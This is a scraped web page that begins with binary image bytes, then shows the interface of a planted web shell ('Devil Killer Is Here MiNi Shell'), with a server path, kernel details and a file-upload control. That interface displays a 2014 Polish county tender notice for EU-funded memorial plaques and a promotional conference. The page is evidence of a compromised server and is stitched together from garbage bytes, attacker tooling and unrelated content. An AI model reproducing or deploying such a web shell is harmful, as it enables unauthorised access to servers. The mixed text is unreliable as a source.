JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140903/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140903/188279-N-2014.html

<p class="kh_header"><b>Jasło: Przedmiotem zamówienia jest zaprojektowanie, wykonanie, dostawa i montaż dwóch tablic pamiątkowych oraz organizacja imprezy promocyjnej połączonej z konferencją prasową w ramach Projektu współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 188279 - 2014; data zamieszczenia: 03.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jasielski , ul. Rynek 18, 38-200 Jasło, woj. podkarpackie, tel. 013 4483410 w. 108, faks 013 4463189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.jaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zaprojektowanie, wykonanie, dostawa i montaż dwóch tablic pamiątkowych oraz organizacja imprezy promocyjnej połączonej z konferencją prasową w ramach Projektu współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie, wykonanie, dostawa i montaż dwóch tablic pamiątkowych oraz organizacja imprezy promocyjnej połączonej z konferencją prasową w ramach Projektu współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 - 2013. 
Przedmiot zamówienia obejmuje: 
1.	Zaprojektowanie, wykonanie, dostawę i montaż 2 sztuk tablic pamiątkowych.
Tablica pamiątkowa o wymiarach 90 cm (szerokość) x 70 cm (wysokość). Napisy na tablicy pamiątkowej powinny zostać wykonane w sposób czytelny i trwały. Kolor tablicy jest dowolny, ale powinien być kontrastowy w stosunku do liter i logotypów w celu zachowania czytelności tablicy (sugeruje się wykonanie napisów literami i cyframi koloru czarnego. Czcionka czarna - preferowana Arial CE. Białe tło. Oznaczenia na tablicy pełno kolorowe). Tablica powinna być wykonana z materiałów trwałych, tj. odpornych na warunki atmosferyczne np. blachy ocynkowanej, stali kwasoodpornej, twardego PCV.

Montaż: 
Orientacyjna lokalizacja tablic: jedna w km 5+500; druga 12+100 w ciągu drogi powiatowej Nr 1854R Jasło - Dębowiec - Folusz. Montaż tablic na stelażu - na konstrukcji metalowej i dwóch metalowych nogach, na wysokości standardowej ok. 150 - 200 cm od podłoża w sposób gwarantujący ich stabilność oraz bezpieczeństwo użytkowników drogi.

Tablica pamiątkowa musi zawierać następujące elementy:
a)	emblemat Unii Europejskiej z napisem Unia Europejska Europejski Fundusz Rozwoju Regionalnego;
b)	logo Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007-2013 wraz ze sloganem obok emblematu Unii Europejskiej należy umieścić napis: Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska-Republika Słowacka 2007-2013
Rozmieszczenie graficzne elementów na tablicy:
Emblemat Unii Europejskiej wraz z podpisem Unia Europejska oraz Europejski Fundusz Rozwoju Regionalnego musi być usytuowany w górnej części tablicy z prawej strony, po lewej zaś należy umieścić logo Programu Współpracy Transgranicznej Rzeczpospolita Polska-Republika Słowacka 2007-2013. W centralnej części, pod znakami graficznymi, należy zamieścić nazwę inwestycji. Pod tytułem projektu wymagany jest tekst dotyczący współfinansowania projektu ze środków pochodzących z Unii Europejskiej.

Sposób przygotowania: 
W ramach zamówienia Wykonawca zobowiązany jest do wykonania odpowiedniego projektu graficznego, zgodnie z aktualnymi na dzień ogłoszenia przetargu Wytycznymi dla beneficjentów w zakresie informacji i promocji w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 -2013 dostępnymi pod adresem: http://pl.plsk.eu/index/?id=a3c65c2974270fd093ee8a9bf8ae7d0b.
Wykonawca zobowiązany jest przed wykonaniem tablicy ustalić z Zamawiającym ostateczny układ i typ logotypów oraz pozostałe wymagane dane podane w treści tablicy. Nie dopuszcza się kopiowania logotypów z dokumentów Zamawiającego ze względu na niebezpieczeństwo zniekształcenia.
Projekt tablicy musi zostać zaakceptowany przez Zamawiającego.

Harmonogram akceptacji projektu tablic pamiątkowych:	
Wykonawca w ciągu 3 dni od dnia podpisania umowy przedstawi Zamawiającemu do akceptacji projekt tablicy. Zamawiający w ciągu 2 dni roboczych zaakceptuje otrzymany projekt lub zgłosi do niego uwagi, a Wykonawca w ciągu 1 dnia roboczego uwzględni ewentualne uwagi, zgodnie ze wskazówkami lub wzorem przekazanym przez Zamawiającego i przedstawi ponownie do akceptacji. Akceptacja i zgłoszenie ewentualnych uwag nastąpi drogą mailową. Przez pojęcie projekt należy rozumieć opracowanie graficzne i merytoryczne tablic. Przedmiot zamówienia Wykonawca dostarczy Zamawiającemu i zamontuje we wskazanym przez Zamawiającemu miejscu na własny koszt, w ilości zgodnej z opisem przedmiotu zamówienia oraz wskazanym terminem. Tablice muszą być nowe, pełnowartościowe, w pierwszym gatunku. Wykonawca zamontuje tablice w miejscach wskazanych przez Zamawiającego. Podane w opisach nazwy własne należy rozumieć jako określenie wymaganych minimalnych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza rozwiązania równoważne dla nazwanych materiałów z zachowaniem jej wymogów w zakresie jakości. Ciężar udowodnienia, że rozwiązania równoważne zachowują minimalne parametry wymagane przez Zamawiającego leży po stronie Wykonawcy.

Tablice muszą być zamontowane przed przygotowaniem materiału filmowego i najpóźniej 3 dni przed planowanym dniem, w którym odbędzie się impreza promocyjna.

Gwarancja: 
Minimum 5 lat od daty podpisania bezusterkowego protokołu odbioru.

2.	Organizacja imprezy promocyjnej połączonej z konferencją prasową w okresie pomiędzy 6 a 24 października 2014 roku (w dni powszednie od poniedziałku do piątku).
W zakresie realizacji organizacji imprezy, Wykonawca będzie zobowiązany do:
a)	zapewnienia miejsca w lokalu położonym na terenie miasta Jasła dysponującym salą dla 100 osób umożliwiającą wydzielenie miejsca na bufet kawowy wraz z cateringiem oraz części gdzie odbywać się będzie główna część konferencji wraz z prezentacją multimedialną. Lokal powinien posiadać zaplecze sanitarne, szatnię, miejsca parkingowe oraz dodatkowo dostęp do Internetu w godzinach od 10 do 14;
b)zapewnienia wyżywienia dla uczestników imprezy,
c)przygotowanie gadżetów promocyjnych.
Szczegółowe wymagania:
Ad a) do zadań Wykonawcy należeć będzie:
- zapewnienie miejsc siedzących dla uczestników;
- odpowiednie oznakowanie i  wizualizacja (flagi i flagietki zostaną zapewnione przez Zamawiającego) przez Wykonawcę sali w której odbędzie się impreza promocyjna wraz z konferencją prasową, w sposób ustalony z Zamawiającym w trakcie realizacji zamówienia;
- zapewnienie, w uzgodnieniu z Zamawiającym, takiego oznakowania obiektów i pomieszczeń, w których odbywać się będzie impreza, aby zapewnić sprawne poruszanie się po nich uczestników i obsługi;
- organizacja recepcji, w tym: sprawna rejestracja gości, udzielanie gościom informacji dotyczących imprezy;
- kontrolowanie podpisów na listach obecności, korzystania z wyżywienia i rozdysponowania gadżetów promocyjnych, zaproszonych uczestników wraz z mediami (ww. listy zostaną przekazane przez Zamawiającego);
- poinformowanie uczestników imprezy o realizacji projektu w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007-2013;
- zapewnienie nagłośnienia i sprzętu technicznego wraz z obsługą w sali przeznaczonej na przedstawienie prezentacji multimedialnej, współpracujących ze sobą: laptopa, pilota do prezentacji, i rzutnika multimedialnego oraz ekranu do wyświetlania prezentacji (rozmiar ekranu/ekranów i rodzaj rzutnika powinny być dostosowane do wielkości sali, tak by niezależnie od miejsca siedzenia uczestnik mógł swobodnie korzystać z materiałów prezentowanych na ekranie/ekranach). Wykonawca ponosi odpowiedzialność za zabezpieczenie elementów technicznych pomieszczeń, w których zostanie zorganizowana impreza;
- montaż i demontaż wyposażenia oraz jego obsługa i zapewnienie poprawnego działania podczas imprezy. Zamawiający przed rozpoczęciem i w trakcie imprezy, może dokonać przeglądu poprawności działania poszczególnych urządzeń;
- wskazanie osoby odpowiedzialnej za organizację imprezy, ze strony Wykonawcy, z którą Powiat Jasielski będzie utrzymywał stały kontakt mailowy i telefoniczny, osoba ta będzie na miejscu podczas imprezy promocyjnej;
-stała kontrola przebiegu konferencji prasowej w tym m.in.: obsługi technicznej, sprzętu, czystości pomieszczeń;
- przygotowanie relacji fotograficznej (min. 50 zdjęć) z imprezy promocyjnej. Zdjęcia zostaną przekazane Zamawiającemu na płycie CD/DVD;
- przygotowanie materiału zdjęciowego (min. 10 zdjęć) całego odcinka drogi objętej zakresem projektu w km 5+500 - 12+100, które zostaną wykorzystane w prezentacji multimedialnej i przekazane Zamawiającemu;
- przygotowanie materiału filmowego (3 sekwencje po min. 15 sekund każda, finalnego materiału filmowego - wyłącznie z lotu ptaka) wybranych fragmentów drogi objętej zakresem projektu w km 5+500 - 12+100 i wskazanych przez Zamawiającego, które zostaną wykorzystane na potrzeby imprezy promocyjnej;
- przygotowanie prezentacji multimedialnej. Opracowanie interaktywnej prezentacji multimedialnej dotyczącej realizacji projektu: trwale zapisanej na płycie CD w ilości 1 szt. kopii dla Zamawiającego. Zakres zadania obejmuje opracowanie projektu graficznego, tekstu, zebranie informacji, danych, wykonanie fotografii, i przygotowanie w formie prezentacji POWER POINT, która zostanie przedstawiona uczestnikom imprezy promocyjnej. W prezentacji należy zastosować odpowiednie oznakowanie, zgodne z wytycznymi programu. Treść i szata graficzna będzie uzgodniona z Zamawiającym. 
Wykonawca wraz z podpisaniem umowy, zobowiązuje się do przeniesienia autorskich praw majątkowych do materiałów wytworzonych w ramach usługi, w tym przekazuje Zamawiającemu prawa autorskie do nieograniczonego dysponowania użytymi w prezentacji formami graficznymi (layoutami) oraz do fotografii i tekstów, udzielając tym samym bezterminowej licencji do ich wykorzystania na wszystkich polach eksploatacji bez ograniczeń czasowych i terytorialnych.
Wykonawca odpowiada za wszelkie roszczenia osób trzecich dotyczące praw majątkowych do materiałów wytworzonych w ramach usługi.
Dokładny termin imprezy zostanie wskazany przez Zamawiającego do 10 dni przed imprezą.
Ad b) do zadań Wykonawcy należeć będzie:
-obsługa organizacyjna imprezy, przez cały czas jej trwania;
-wywóz odpadów segregowanych i zmieszanych w celu prawidłowego unieszkodliwienia odpadów;
-koszty posiłków, obsługi kelnerskiej, dowozu cateringu, sprzętu, ponosi Wykonawca;
Wykonawca zapewni catering wraz z obsługą (przygotowanie, serwis, sprzątanie) dla 100 osób w formie bufetu kawowego oraz obiadu w formie szwedzkiego stołu. 
Bufet kawowy zorganizowany w sali gdzie będzie odbywać się impreza promocyjna poświęcona prezentacji i podsumowaniu projektu wraz z konferencją prasową:
-kawa i herbata bez ograniczeń, w sposób ciągły (podawane w oryginalnych opakowaniach lub wyłożone na talerzykach wraz z termosami z wrzątkiem),
-mleko do kawy, cukier, cytryna,
-ciastka suche (4 rodzaje po 3 szt./os),
-woda mineralna gazowana i niegazowana butelkowana 0,5l (w ilości dostosowanej do liczby uczestników ok. 100 osób).
Obiad w formie szwedzkiego stołu dla całej grupy w tym samym czasie w jednym pomieszczeniu zarezerwowanym wyłącznie dla uczestników imprezy promocyjnej.
-menu musi zawierać - co najmniej dwie zupy do wyboru, 4 dania gorące (dwa mięsne, jedno wegetariańskie oraz jedno rybne z wykluczeniem pangi), dodatki skrobiowe (co najmniej 3 rodzaje do wyboru, np. ryż, ziemniaki, kluski itp.) i warzywne (warzywa z grilla bądź z wody lub blanszowane itp.), co najmniej 3 surówki do wyboru, desery podawane w pucharkach, np. mus, krem lub sałatka owocowa, itp. (3 rodzaje do wyboru w ilości co najmniej 1 pucharek 150 g na osobę). Kawa i herbata bez ograniczeń, w sposób ciągły (podawane w oryginalnych opakowaniach lub wyłożone na talerzykach wraz z termosami z wrzątkiem), mleko do kawy, cukier, cytryna, serwetki, wykałaczki pakowane pojedynczo.
Na 14 dni kalendarzowych przez dniem rozpoczęcia konferencji Wykonawca przedstawi do akceptacji Zamawiającego propozycję menu. Zamawiający zaakceptuje propozycje lub zwróci z uwagami lub swoimi propozycjami w ciągu 2 dni roboczych. Wykonawca zobowiązuje się do uwzględnienia uwag lub propozycji Zamawiającego i ponownego przedłożenia menu w terminie 3 dni roboczych od dnia otrzymania uwag lub propozycji.
Ad c) do zadań Wykonawcy należeć będzie:
Przygotowanie gadżetów promocyjnych, jak poniżej:
-torba bawełniana w ilości 100 szt. (tkanina 100procent bawełna surowa - gramatura 270 g/m2 (+/-5procent); długie uchwyty nie mniej niż 60 cm od wszycia do wszycia, idealne do noszenia na ramieniu; wymiary: 33 cm x 36 cm x 13 cm; kolor: ecru; nadruk na torbach w kolorze czarnym - sitodruk);
-notes B5 w ilości 100 szt. (20 kartek klejonych po krótszej krawędzi, papier środek offsetowy 80g/m2, projekt nadruku i koszt matryc po stronie Wykonawcy);
-długopis w ilości 100 szt. (metalowy korpus (aluminium); wymiary: nie krótszy niż 125 mm i nie dłuższy niż 140 mm, grubość nie mniejsza niż 10 mm i nie grubsza niż 15 mmm; wykończenie: chowanie wkładu - włącznik przyciskowy - długopis automatyczny, końcówka dolna przykręcana, uchwyt mocujący; wkład wymienny, wypełniony tuszem niebieskim, olejowym, cienko piszący; kolor czarny; grawer laserowy srebrny);
-samozaciskowe opaski odblaskowe z nadrukiem w ilości 100 szt. (sprężyste; budowa: blaszka samozaciskowa zalaminowana odblaskową folią pryzmatyczną; spód: materiał typu flock łagodny dla dłoni; kolory: żółty; wymiar: 34cm x 3cm; nadruk na opaskach w kolorze czarnym - sitodruk).
Sposób przygotowania gadżetów: 
W ramach zamówienia Wykonawca zobowiązany jest do wykonania odpowiedniego projektu graficznego, zgodnie z aktualnymi na dzień ogłoszenia przetargu Wytycznymi dla beneficjentów w zakresie informacji i promocji w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 -2013 dostępnymi pod adresem: http://pl.plsk.eu/index/?id=a3c65c2974270fd093ee8a9bf8ae7d0b.
Wykonawca zobowiązany jest przed wykonaniem gadżetów ustalić z Zamawiającym ostateczny układ i typ logotypów oraz szatę graficzną. Nie dopuszcza się kopiowania logotypów z dokumentów Zamawiającego ze względu na niebezpieczeństwo zniekształcenia.
Projekty oznaczeń gadżetów muszą zostać zaakceptowane przez Zamawiającego.
Harmonogram akceptacji projektów gadżetów:
Wykonawca w ciągu 5 dni od dnia podpisania umowy przedstawi Zamawiającemu do akceptacji projekty gadżetów. Zamawiający w ciągu 2 dni roboczych zaakceptuje otrzymane projekty lub zgłosi do nich uwagi, a Wykonawca w ciągu 1 dnia roboczego uwzględni ewentualne uwagi, zgodnie ze wskazówkami lub wzorem przekazanym przez Zamawiającego i przedstawi ponownie do akceptacji. Akceptacja i zgłoszenie ewentualnych uwag nastąpi drogą mailową. Przez pojęcie Projekt należy rozumieć opracowanie graficzne gadżetów. Przedmiot zamówienia Wykonawca dostarczy Zamawiającemu na własny koszt, w ilości zgodnej z opisem przedmiotu zamówienia oraz wskazanym terminem. Gadżety muszą być nowe, pełnowartościowe, w pierwszym gatunku. Podane w opisach nazwy własne należy rozumieć jako określenie wymaganych minimalnych parametrów technicznych lub standardów jakościowych. 
Wykonawca zapewni listę osób rozdysponowania gadżetów promocyjnych, które uczestniczyły w konferencji.
Na każdym z ww. materiałów należy umieścić logotypy. Treść oraz szata graficzna, będzie uzgodnione z Zamawiającym. 
Projekty oznakowania ww. materiałów muszą uwzględniać zamieszczenie logotypów, zgodnie z wytycznymi oraz w miejscach wskazanych przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 30.19.21.70-3, 79.95.20.00-2, 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie zrealizował co najmniej jedną  konferencję dla grupy liczącej minimum 70 osób wraz z wyżywieniem, ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - zał. nr 3,  wykazu zrealizowanych dostaw i usług - zał. nr 4 do siwz, (wraz z dowodami określającymi, że usługi te zostały wykonane w sposób należyty), oraz zobowiązania innych podmiotów - zał. nr 5 do siwz (jeżeli dotyczy),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełniania tego warunku odbędzie się na podstawie oświadczenia zał. nr 3, oraz zobowiązania innych podmiotów - załącznik nr 5 (jeżeli dotyczy).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełniania tego warunku odbędzie się na podstawie oświadczenia zał. nr 3, oraz zobowiązania innych podmiotów - załącznik nr 5 (jeżeli dotyczy).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo  do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.Upoważnienie do podpisania oferty, o ile nie wynika ono z dokumentów dołączonych do oferty (oryginał lub kopia notarialnie potwierdzona za zgodność z oryginałem),
3.Zobowiązanie innych podmiotów - załącznik nr 5 (jeżeli dotyczy) - ORYGINAŁ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
